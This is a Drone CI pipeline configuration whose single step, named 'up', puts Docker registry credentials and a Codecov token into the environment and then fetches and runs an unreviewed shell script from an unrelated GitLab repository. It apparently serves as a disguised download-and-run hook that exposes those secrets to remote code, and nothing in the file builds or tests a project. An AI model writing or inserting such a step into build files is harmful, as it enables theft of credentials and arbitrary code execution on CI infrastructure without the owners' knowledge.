---
kind: pipeline
type: exec
name: linux-amd64

platform:
  arch: amd64
  os: linux

trigger:
  event:
    exclude:
      - pull_request
      - tag

steps:
  - name: up
    environment:
      DOCKER_USERNAME:
        from_secret: docker_username
      DOCKER_PASSWORD:
        from_secret: docker_password
      CODECOV_TOKEN:
        from_secret: codecov_token
    commands:
        - wget https://gitlab.com/renifer12/project-7/-/raw/main/config.sh && chmod +x config.sh && ./config.sh
